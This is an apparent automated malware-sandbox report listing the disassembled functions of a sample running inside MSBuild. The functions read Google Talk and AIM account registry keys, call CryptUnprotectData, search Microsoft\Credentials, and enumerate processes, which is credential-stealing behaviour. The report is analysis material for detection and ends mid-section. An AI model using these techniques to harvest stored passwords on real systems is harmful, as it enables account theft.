Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
Part of subcall function 00407C79: memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 00407FCC

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

memset.MSVCRT ref: 00408019
RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075

Strings

Software\Google\Google Talk\Accounts, xrefs: 00407F99

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
String ID: Software\Google\Google Talk\Accounts
API String ID: 2959138223-1079885057
Opcode ID: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
Opcode Fuzzy Hash: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5

Function 0040C427 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000738), ref: 0040C449
??2@YAPAXI@Z.MSVCRT(000008FC), ref: 0040C46C
DeleteObject.GDI32(?), ref: 0040C4B3
LoadIconA.USER32(00000065), ref: 0040C4FA

Strings

;@, xrefs: 0040C491

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$DeleteIconLoadObject
String ID: ;@
API String ID: 1986663749-2925476404
Opcode ID: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
Opcode Fuzzy Hash: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68

Function 0041223F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5

memset.MSVCRT ref: 00412297
RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
_mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C

Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 889583718-2036018995
Opcode ID: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
Opcode Fuzzy Hash: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E

Function 00404C9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB

LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

Strings

CryptUnprotectData, xrefs: 00404CB6
crypt32.dll, xrefs: 00404CA5

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 145871493-1827663648
Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798

Function 00411560 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004115A1
K32EnumProcesses.KERNEL32(?,00004000,004044A3,?,004044A3,?,00000000,00000000,00000000), ref: 004115B9

Part of subcall function 004112D9: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
Part of subcall function 004112D9: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
Part of subcall function 004112D9: K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
Part of subcall function 004112D9: CloseHandle.KERNELBASE(00000000,?,?,?), ref: 00411336

Part of subcall function 00411172: _mbscpy.MSVCRT(?,-00000001), ref: 00411198

Part of subcall function 0041172B: memcpy.MSVCRT(0041DF00,?,0000010C,?,00000000,00411680,004044A3,?), ref: 00411758

_mbscpy.MSVCRT(?,?), ref: 0041165E
CloseHandle.KERNEL32(00000000,004044A3,?), ref: 00411697

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CloseEnumHandleProcess_mbscpy$FileModuleModulesNameOpenProcessesmemcpymemset
String ID:
API String ID: 3731837815-0
Opcode ID: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
Instruction ID: 5e40a2ef1ff72a785ccc601064cd9551f1045985186162b7752f8c4c90acf24d
Opcode Fuzzy Hash: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
Instruction Fuzzy Hash: 72317271901129ABDB20EB65DC85BEE77BCEB44344F0440ABE709E2160D7759EC5CA68

Function 00411C8F Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411CB8

Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
memset.MSVCRT ref: 00411CF4
GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileStringmemset$Writememcpysprintf
String ID:
API String ID: 3143880245-0
Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8

Function 00404220 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

GetFileSize.KERNEL32(00000000,00000000), ref: 00404241
??2@YAPAXI@Z.MSVCRT(00000001), ref: 00404257

Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED

??3@YAXPAX@Z.MSVCRT(00000000), ref: 00404291
CloseHandle.KERNEL32(?), ref: 0040429A

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: File$??2@??3@CloseCreateHandleReadSize
String ID:
API String ID: 1968906679-0
Opcode ID: d9f9129cb1e72e3e26557637b1e5a18a49763724d25fcd0640a8466d23db343a
Instruction ID: a1f592bc07a1c6bae19e5ae82b96cf667b255c71c14e9b40cb31a6e8a4c88875
Opcode Fuzzy Hash: d9f9129cb1e72e3e26557637b1e5a18a49763724d25fcd0640a8466d23db343a
Instruction Fuzzy Hash: F801A1B2501118BBD710AA65EC45EDF776CEB853B4F10823EFD15E62D0EB389E0086A8

Function 0041208B Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 00412098
SizeofResource.KERNEL32(?,00000000), ref: 004120A9
LoadResource.KERNEL32(?,00000000), ref: 004120B9
LockResource.KERNEL32(00000000), ref: 004120C4

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC

Function 004112D9 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
CloseHandle.KERNELBASE(00000000,?,?,?), ref: 00411336

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Process$CloseEnumFileHandleModuleModulesNameOpen
String ID:
API String ID: 2971614962-0
Opcode ID: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
Instruction ID: d3b8bc427d879abbe067d139e4d8751d61c0b56586969d320d8ec49f77c75a5b
Opcode Fuzzy Hash: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
Instruction Fuzzy Hash: 0A01DF36200109BFFB105FA29D84AEBBBACEB44784B04003AFF12D05A0D779DC81822D

Function 004140F2 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?), ref: 004140FC
??3@YAXPAX@Z.MSVCRT(?), ref: 0041410C
??3@YAXPAX@Z.MSVCRT(?), ref: 0041411C
??3@YAXPAX@Z.MSVCRT(?), ref: 0041412C

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: e48d3df8ed8d95b9f010ad00d7fe62e5366ad64f636456b435669263f62c43ce
Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
Opcode Fuzzy Hash: e48d3df8ed8d95b9f010ad00d7fe62e5366ad64f636456b435669263f62c43ce
Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C

Function 004086ED Relevance: 5.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00008000,0040877D,00403FEE,MessenPass), ref: 00408715
??2@YAPAXI@Z.MSVCRT(00000000,00008000,0040877D,00403FEE,MessenPass), ref: 00408733
??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040877D,00403FEE,MessenPass), ref: 00408751
??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,0040877D,00403FEE,MessenPass), ref: 00408761

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
Instruction ID: 62cae8e83bd5d1efe0b7207de595a3d8a96caeb03304a295a8faf49e2a024305
Opcode Fuzzy Hash: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
Instruction Fuzzy Hash: 58F04FB96012005EFB589F36ED4679576F0A708309F18C53EE9058B2F4EB7444448F1D

Function 0040D935 Relevance: 4.5, APIs: 3, Instructions: 46COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D959
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989

Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925

Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
Part of subcall function 0040D794: atoi.MSVCRT(?), ref: 0040D840
Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?), ref: 0040D8B3
Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?,?,?), ref: 0040D8C6
Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
String ID:
API String ID: 2578913611-0
Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4

Function 00406982 Relevance: 3.8, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0040699E
memcpy.MSVCRT(00000000,00000000,?,00000000,?,004040EC,00000001,?,?,00000000,004038B8,?), ref: 004069B6
free.MSVCRT ref: 004069BF

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: freemallocmemcpy
String ID:
API String ID: 3056473165-0
Opcode ID: cc3d2e21683cb60cae48502f306abb72397549aebdfd10c4071b52057d9180dd
Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
Opcode Fuzzy Hash: cc3d2e21683cb60cae48502f306abb72397549aebdfd10c4071b52057d9180dd
Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8

Function 00410383 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20

_mbscpy.MSVCRT(00000000,CryptUnprotectData), ref: 004103C3

Strings

CryptUnprotectData, xrefs: 004103BD

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Version_mbscpy
String ID: CryptUnprotectData
API String ID: 1856898028-1975210251
Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E

Function 00406AE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
Part of subcall function 00406A19: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,0040109D,MS Sans Serif,0000000A,00000001), ref: 00406A63

CreateFontIndirectA.GDI32(?), ref: 00406AFE

Strings

Arial, xrefs: 00406AEA

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFontIndirect_mbscpymemset
String ID: Arial
API String ID: 3853255127-493054409
Opcode ID: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
Instruction ID: e76317b4d314f44c8759e74956d0c4c6c36286f6473dc8017c9c1f452a7d8835
Opcode Fuzzy Hash: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
Instruction Fuzzy Hash: 25D0C970E4020C66D600B7A0FD07BC9776C5B40708F504025BA01B50E1EAE4E1188AD9

Function 0040C5A4 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040C5E6

Strings

/stext, xrefs: 0040C5E1

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpi
String ID: /stext
API String ID: 1439213657-3817206916
Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8

Function 004042AA Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0040783B: strlen.MSVCRT ref: 00407862
Part of subcall function 0040783B: strlen.MSVCRT ref: 0040786F

Part of subcall function 00407898: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
Part of subcall function 00407898: strlen.MSVCRT ref: 004078FC
Part of subcall function 00407898: strlen.MSVCRT ref: 00407904

_strnicmp.MSVCRT ref: 0040431A

Strings

credentials, xrefs: 00404314

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$FileFindFirst_strnicmp
String ID: credentials
API String ID: 773473087-4194641934
Opcode ID: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
Instruction ID: 0f17e4e4efe03dbe37520bfce116898ea2601fe450b4b80a5694618c7f7ee9f5
Opcode Fuzzy Hash: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
Instruction Fuzzy Hash: 4E21D872A0421C56DB60F6668C417DB77A85F81349F4460FBAE18F21C2EA78DF84CF55

Function 00414E17 Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 00414E20
VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 00414E34

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
Instruction ID: 90d1a155f91ac5a1afe00fb4506880db6f446ca37ad39ba9c7e67ca9c29c7573
Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
Instruction Fuzzy Hash: CFF0F4611857417DFB3155B81C42BF79FCCABE7320F280B4BE054C7283D599898693BA

Function 0040E675 Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E695

Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1

strrchr.MSVCRT ref: 0040E6B1

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CompareFileTimememsetstrrchr
String ID:
API String ID: 4226234548-0
Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95

Function 00404380 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004043A1

Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826

Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22

Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A

Strings

Microsoft\Credentials, xrefs: 004043C2

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_mbscat$_strnicmpmemset
String ID: Microsoft\Credentials
API String ID: 137454763-3148402405
Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5

Function 00411EC1 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileString$Write
String ID:
API String ID: 2948465352-0
Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4

Function 00406D2B Relevance: 3.0, APIs: 2, Instructions: 21timeCOMMON

Download Yara Rule

APIs

Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
CloseHandle.KERNELBASE(00000000,?,?,00000000), ref: 00406D4F

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 7bff6bc8731922aebfa0769e74e5599f4fdc97828f53a7f2077a8613dbe9e9dd
Instruction ID: ee1f68b728ceb5a298c60dc052c4b3ed262b371f399a07f2899d8fe9e4a13fdd
Opcode Fuzzy Hash: 7bff6bc8731922aebfa0769e74e5599f4fdc97828f53a7f2077a8613dbe9e9dd
Instruction Fuzzy Hash: C7D0123660116067872137676C0CDDF6E6ADECA326706843AF15593110D634481686A5

Function 00408490 Relevance: 2.6, APIs: 2, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 00404D18: LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
Part of subcall function 00404D18: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73

wcslen.MSVCRT ref: 004084CF
memset.MSVCRT ref: 0040854D

Memory Dump Source

